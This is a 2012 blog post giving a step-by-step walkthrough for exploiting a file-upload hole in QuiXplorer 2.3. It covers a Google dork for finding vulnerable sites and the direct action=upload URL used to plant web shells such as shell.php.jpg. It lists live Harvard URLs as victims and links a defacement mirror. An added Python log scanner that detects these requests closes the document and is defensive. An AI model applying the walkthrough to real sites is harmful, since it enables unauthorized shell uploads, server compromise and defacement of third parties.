Tuesday, May 15, 2012

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily



Open Google.com and type this dork:
intitle:"QuiXplorer 2.3 - the QuiX project"


You'll see a lot of sites; some big websites are vulnerable too, like the Harvard University website.
Select any website from the search results.
Vulnerability


http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager.
You can upload your files here.


Find the edit file, create file, etc. icons on the page and click the last one; it's the upload option.







You can also upload directly by changing the URL: just put action=upload&order=name&srt=yes
after index.php?
Example:
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell example: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or
any other supported file.
Click on your file to view it.
Live demo:
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
I know some asshole will change the deface,
so it's a mirror of the defacements: http://attack-h.org/attack/?id=8452
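
The defender's view of the requests above, as an added example that is not part of the original post: a Python scan of a web server access log for the QuiXplorer `action=list` / `action=upload` requests on `index.php`, followed by a fetch of a script-named file (including double extensions such as `shell.php.jpg`) from the same client. The log lines, hosts and IPs are constructed, and treating a successful POST to the `action=upload` URL as the upload submission is an assumption about how the form posts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; hosts, paths and IPs are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [15/May/2012:10:01:02 +0000] "GET /files/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2012:10:01:40 +0000] "POST /files/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2012:10:02:05 +0000] "GET /filestorage/shell.php.jpg HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2012:10:02:09 +0000] "GET /img/logo.jpg HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.9 - - [15/May/2012:10:03:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A script extension, either final or hidden before one more extension.
SCRIPT_NAME_RE = re.compile(r'\.(php\d?|phtml|asp|aspx)(\.[a-z0-9]+)?$', re.I)
FM_ACTIONS = {"list", "upload"}


def scan(log_text):
    """Return (client, tag, target) findings in log order."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, method, target, status = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query)
        action = qs.get("action", [""])[0]
        if (url.path.endswith("index.php") and action in FM_ACTIONS
                and ("order" in qs or "srt" in qs)):
            # Assumption: the upload form is submitted as a POST to this URL.
            if action == "upload" and method == "POST" and status.startswith("2"):
                uploaders.add(client)
                findings.append((client, "upload-submitted", target))
            else:
                findings.append((client, "filemanager-" + action, target))
        elif client in uploaders and SCRIPT_NAME_RE.search(url.path):
            # Same client requests a script-named file after uploading.
            findings.append((client, "script-fetch-after-upload", target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```
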

